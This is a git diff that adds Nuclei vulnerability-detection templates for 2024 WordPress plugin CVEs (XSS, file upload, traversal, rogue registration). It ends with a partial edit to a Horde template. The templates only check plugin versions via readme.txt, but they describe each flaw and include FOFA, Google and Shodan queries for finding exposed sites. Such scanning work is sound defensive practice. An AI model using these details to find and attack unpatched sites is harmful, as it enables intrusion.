0000000000..bd2e7c2d0e --- /dev/null +++ b/poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5 + +info: + name: > + Secure Downloads <= 1.2.2 - Authenticated (Admin+) Arbitrary File Download + author: topscoder + severity: low + description: > + The Secure Downloads plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.2 via the update() function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/74506798-a198-4ea8-8628-01ce4df27abe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-8031 + metadata: + fofa-query: "wp-content/plugins/secure-downloads/" + google-query: inurl:"/wp-content/plugins/secure-downloads/" + shodan-query: 'vuln:CVE-2024-8031' + tags: cve,wordpress,wp-plugin,secure-downloads,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/secure-downloads/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "secure-downloads" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml b/poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml new file mode 100644 index 0000000000..956460fdf5 --- /dev/null +++ b/poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8242-cdbbac228ad219af93b654766e13b83b + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Authenticated (Subscriber+) Limited Arbitrary File Upload + author: topscoder + severity: low + description: > + The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_user_profile() function in all versions up to, and including, 4.15.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files (not including PHP files) on the affected site's server which may make remote code execution possible. This can be paired with a registration endpoint for unauthenticated users to exploit the issue. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8242 + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:CVE-2024-8242' + tags: cve,wordpress,wp-plugin,mstore-api,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.15.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml b/poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml new file mode 100644 index 0000000000..3c2aa0132c --- /dev/null +++ b/poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190 + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Unauthorized User Registration + author: topscoder + severity: high + description: > + The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 4.15.3. This is due to the plugin not checking that user registration is enabled prior to creating a user account through the register() function. This makes it possible for unauthenticated attackers to create user accounts on sites, even when user registration is disabled and plugin functionality is not activated. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8269 + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:CVE-2024-8269' + tags: cve,wordpress,wp-plugin,mstore-api,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.15.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml b/poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml new file mode 100644 index 0000000000..409ba893d4 --- /dev/null +++ b/poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8656-1116395151f79029236816f9e11f544d + +info: + name: > + WPFactory Helper <= 1.7.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WPFactory Helper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb62eefe-9993-43f7-b3ae-de47c0951bee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8656 + metadata: + fofa-query: "wp-content/plugins/wpcodefactory-helper/" + google-query: inurl:"/wp-content/plugins/wpcodefactory-helper/" + shodan-query: 'vuln:CVE-2024-8656' + tags: cve,wordpress,wp-plugin,wpcodefactory-helper,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpcodefactory-helper/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpcodefactory-helper" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml b/poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml new file mode 100644 index 0000000000..a18351a7b1 --- /dev/null +++ b/poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8663-483f5812b103f5a68eb659c586f798b2 + +info: + name: > + WP Simple Booking Calendar <= 2.0.10 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Simple Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cad4300f-02f9-4c9f-9bb3-1c9da8b78ac9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8663 + metadata: + fofa-query: "wp-content/plugins/wp-simple-booking-calendar/" + google-query: inurl:"/wp-content/plugins/wp-simple-booking-calendar/" + shodan-query: 'vuln:CVE-2024-8663' + tags: cve,wordpress,wp-plugin,wp-simple-booking-calendar,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-simple-booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-simple-booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml b/poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml new file mode 100644 index 0000000000..1687a372d3 --- /dev/null +++ b/poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835 + +info: + name: > + WP Test Email <= 1.1.7 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Test Email plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/70c1ee04-cfb1-4819-95ab-497e814da16f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8664 + metadata: + fofa-query: "wp-content/plugins/wp-test-email/" + google-query: inurl:"/wp-content/plugins/wp-test-email/" + shodan-query: 'vuln:CVE-2024-8664' + tags: cve,wordpress,wp-plugin,wp-test-email,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-test-email/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-test-email" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml b/poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml new file mode 100644 index 0000000000..537105678f --- /dev/null +++ b/poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b + +info: + name: > + YITH Custom Login <= 1.7.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The YITH Custom Login plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8665 + metadata: + fofa-query: "wp-content/plugins/yith-custom-login/" + google-query: inurl:"/wp-content/plugins/yith-custom-login/" + shodan-query: 'vuln:CVE-2024-8665' + tags: cve,wordpress,wp-plugin,yith-custom-login,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/yith-custom-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "yith-custom-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml b/poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml new file mode 100644 index 0000000000..da4c4d5a3a --- /dev/null +++ b/poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8714-03b5605b5eeba70097fb089d33700336 + +info: + name: > + WordPress Affiliates Plugin — SliceWP Affiliates <= 1.1.20 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WordPress Affiliates Plugin — SliceWP Affiliates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.20. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/45dd22d4-9a51-4569-a756-1f1a5f8626c1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8714 + metadata: + fofa-query: "wp-content/plugins/slicewp/" + google-query: inurl:"/wp-content/plugins/slicewp/" + shodan-query: 'vuln:CVE-2024-8714' + tags: cve,wordpress,wp-plugin,slicewp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slicewp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slicewp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.20') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml b/poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml new file mode 100644 index 0000000000..6fbe4084eb --- /dev/null +++ b/poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8730-efc3370bbeb807667af618ae74e58df1 + +info: + name: > + Exit Notifier <= 1.9.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Exit Notifier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc1aedb-e64f-4b61-a247-c3cdc731f001?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8730 + metadata: + fofa-query: "wp-content/plugins/exit-notifier/" + google-query: inurl:"/wp-content/plugins/exit-notifier/" + shodan-query: 'vuln:CVE-2024-8730' + tags: cve,wordpress,wp-plugin,exit-notifier,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/exit-notifier/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "exit-notifier" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml b/poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml new file mode 100644 index 0000000000..571072f559 --- /dev/null +++ b/poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6 + +info: + name: > + Cron Jobs <= 1.2.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Cron Jobs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f6da693-4610-4875-aa14-102809309b8d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8731 + metadata: + fofa-query: "wp-content/plugins/leira-cron-jobs/" + google-query: inurl:"/wp-content/plugins/leira-cron-jobs/" + shodan-query: 'vuln:CVE-2024-8731' + tags: cve,wordpress,wp-plugin,leira-cron-jobs,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leira-cron-jobs/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leira-cron-jobs" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml b/poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml new file mode 100644 index 0000000000..b28d5f0d68 --- /dev/null +++ b/poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8732-f30eab986c0f8516da683155679193fc + +info: + name: > + Roles & Capabilities <= 1.1.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Roles & Capabilities plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3956cd40-6b46-4013-9d71-a979de2c3687?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8732 + metadata: + fofa-query: "wp-content/plugins/leira-roles/" + google-query: inurl:"/wp-content/plugins/leira-roles/" + shodan-query: 'vuln:CVE-2024-8732' + tags: cve,wordpress,wp-plugin,leira-roles,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leira-roles/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leira-roles" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml b/poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml new file mode 100644 index 0000000000..7781b36ca7 --- /dev/null +++ b/poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc + +info: + name: > + Lucas String Replace <= 2.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Lucas String Replace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf1e4b20-e7e5-4a3a-9895-02d51499d54e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8734 + metadata: + fofa-query: "wp-content/plugins/lucas-string-replace/" + google-query: inurl:"/wp-content/plugins/lucas-string-replace/" + shodan-query: 'vuln:CVE-2024-8734' + tags: cve,wordpress,wp-plugin,lucas-string-replace,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/lucas-string-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "lucas-string-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml b/poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml new file mode 100644 index 0000000000..a250aa5111 --- /dev/null +++ b/poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1 + +info: + name: > + PDF Thumbnail Generator <= 1.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The PDF Thumbnail Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b183587b-95bd-4e82-bfc7-db5a8fbd58f9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8737 + metadata: + fofa-query: "wp-content/plugins/pdf-thumbnail-generator/" + google-query: inurl:"/wp-content/plugins/pdf-thumbnail-generator/" + shodan-query: 'vuln:CVE-2024-8737' + tags: cve,wordpress,wp-plugin,pdf-thumbnail-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pdf-thumbnail-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pdf-thumbnail-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml b/poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml new file mode 100644 index 0000000000..b2d3b4c930 --- /dev/null +++ b/poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d + +info: + name: > + Essential Addons for Elementor <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Filterable Gallery Widget + author: topscoder + severity: low + description: > + The Essential Addons for Elementor – Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/76c292dc-e9da-4256-82df-58ac5def4771?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8742 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-8742' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml b/poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml new file mode 100644 index 0000000000..cc1324f287 --- /dev/null +++ b/poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8747-f757d510ac120bf89329e22a6153766c + +info: + name: > + Email Obfuscate Shortcode <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Email Obfuscate Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'email-obfuscate' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/77bed6ce-84e7-4b71-8acd-bb5b73e362d2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8747 + metadata: + fofa-query: "wp-content/plugins/email-obfuscate-shortcode/" + google-query: inurl:"/wp-content/plugins/email-obfuscate-shortcode/" + shodan-query: 'vuln:CVE-2024-8747' + tags: cve,wordpress,wp-plugin,email-obfuscate-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/email-obfuscate-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "email-obfuscate-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0') \ No newline at end of file diff --git a/poc/cve/cve-2005-3344.yaml b/poc/cve/cve-2005-3344.yaml index 89f0e31e60..d81cd137c4 100644 --- a/poc/cve/cve-2005-3344.yaml +++ b/poc/cve/cve-2005-3344.yaml @@ -5,46 +5,32 @@ info: author: pikpikcu severity: critical description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. - impact: | - An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system. - remediation: | - Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. + tags: horde,unauth + remediation: reference: - https://nvd.nist.gov/vuln/detail/CVE-2005-3344 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344 - - http://www.debian.org/security/2005/dsa-884 - - 